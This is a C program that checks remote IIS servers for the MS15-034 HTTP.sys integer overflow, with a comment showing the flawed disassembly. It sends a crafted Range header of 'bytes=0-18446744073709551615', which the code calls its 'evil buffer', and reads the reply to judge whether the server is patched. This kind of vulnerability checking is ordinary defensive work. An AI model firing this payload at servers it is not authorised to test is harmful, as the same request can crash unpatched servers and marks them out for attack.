/*
 PARTLYTESTED - MS15-034 Checker
  
 THE BUG:

	8a8b2112 56		 push	 esi
	8a8b2113 6a00		 push	 0
	8a8b2115 2bc7		 sub	 eax,edi
	8a8b2117 6a01		 push	 1
	8a8b2119 1bca		 sbb	 ecx,edx
	8a8b211b 51		 push	 ecx
	8a8b211c 50		 push	 eax
	8a8b211d e8bf69fbff	 call	 HTTP!RtlULongLongAdd (8a868ae1) ; here

	ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4

	BY: john.b.hale@gmai.com
	Twitter: @rhcp011235
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <arpa/inet.h>

int connect_to_server(char *ip)
{
	int sockfd;
	struct sockaddr_in serv_addr;

	if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
		perror("socket\n");
		exit(1);
	}

	memset(&serv_addr, 0, sizeof(serv_addr));
	serv_addr.sin_family = AF_INET;
	serv_addr.sin_port = htons(80);
	if (inet_pton(AF_INET, ip, &serv_addr.sin_addr) <= 0) {
		perror("inet_pton");
		exit(1);
	}
	if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) {
		perror("connect()");
		exit(1);
	}

	return sockfd;
}

ssize_t safe_write(int fd, const char *buf, size_t len)
{
	int r, ofs = 0;

	for (;;) {
		r = write(fd, buf + ofs, len - ofs);

		if (r > 0) {
			ofs+= r;
			if (ofs == len)
				return ofs;
		} else if (r == 0) {
			return ofs;
		} else if ((errno == EAGAIN) ||
			   (errno == EINTR)) {
			continue;
		} else {
			perror("write()");
			exit(1);
		}
	}
}

ssize_t safe_read(int fd, char *buf, size_t len)
{
	int r, ofs = 0;

	for (;;) {
		r = read(fd, buf + ofs, len - ofs);

		if (r > 0) {
			ofs+= r;
			if (ofs == len)
				return ofs;
		} else if (r == 0) {
			return ofs;
		} else {
			if ((errno == EAGAIN) ||
			    (errno == EINTR))
				continue;
			perror("read()");
			exit(1);
		}
	}
}

void bodychop(char *buf, int r)
{
	int i;

	buf[r] = '\0';
	for (i = 0;i < r;i++) {
		if (buf[i] != '\n')
			continue;
		if (buf[i+1] == '\n' || (buf[i+1] == '\r' && buf[i+2] == '\n')) {
			buf[i] = '\0';
			break;
		}
	}
}

int main(int argc, char *argv[])
{
	int sockfd, r;
	char recvbuf[1024];

	// Check server
	char request[] = "GET / HTTP/1.0\r\n\r\n";

	// our evil buffer
	char request1[] = "GET / HTTP/1.1\r\nHost: localhost\r\nRange: bytes=0-18446744073709551615\r\n\r\n";

	if (argc != 2) {
		printf("Usage: %s <ip of server>\n", argv[0]);
		return 1;
	}

	sockfd = connect_to_server(argv[1]);
	safe_write(sockfd, request, strlen(request));
	r = safe_read(sockfd, recvbuf, sizeof(recvbuf)-1);
	bodychop(recvbuf, r);

	if (!strstr(recvbuf,"Microsoft"))
		printf("[*] NOT IIS\n");

	sockfd = connect_to_server(argv[1]);
	safe_write(sockfd, request1, strlen(request1));
	r = safe_read(sockfd, recvbuf, sizeof(recvbuf)-1);
	bodychop(recvbuf, r);

	if (strstr(recvbuf,"Requested Range Not Satisfiable"))
		printf("[!] Looks VULN\n");
	else if (strstr(recvbuf,"The request has an invalid header name\n"))
		printf("[*] Looks Patched");
	else
		printf("[*] Unexpected response; cannot discern patch status\n");

	printf("%s\n", recvbuf);
	exit(0);
}